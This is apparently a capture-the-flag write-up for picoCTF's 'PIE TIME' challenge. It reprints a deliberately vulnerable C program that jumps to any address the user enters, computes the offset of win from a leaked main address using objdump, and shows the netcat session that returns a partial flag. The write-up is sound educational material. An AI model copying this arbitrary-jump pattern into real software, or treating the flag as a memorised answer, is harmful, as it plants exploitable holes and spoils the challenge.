PIE TIME

Can you try to get the flag? Beware we have PIE! Additional details will be available after launching your challenge instance.

we have the following code with PIE enabled.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL)
  {
      printf("Cannot open file.\n");
      exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF)
  {
      printf ("%c", c);
      c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  printf("Address of main: %p\n", &main);

  unsigned long val;
  printf("Enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);
  printf("Your input: %lx\n", val);

  void (*foo)(void) = (void (*)())val;
  foo();
}

but it leaks the address of the main function, which means that we can calculate the address of the win function.

$ objdump -M intel -S vuln | grep main\>:
000000000000133d <main>:
$ objdump -M intel -S vuln | grep win\>:
00000000000012a7 <win>:

win is located 0x96 bytes before main

$ nc rescued-float.picoctf.net 53312
Address of main: 0x64fa8620233d
Enter the address to jump to, ex => 0x12345: 0x64fa862022a7
Your input: 64fa862022a7
You won!
picoCTF{b4s1c...

Last updated 11 days ago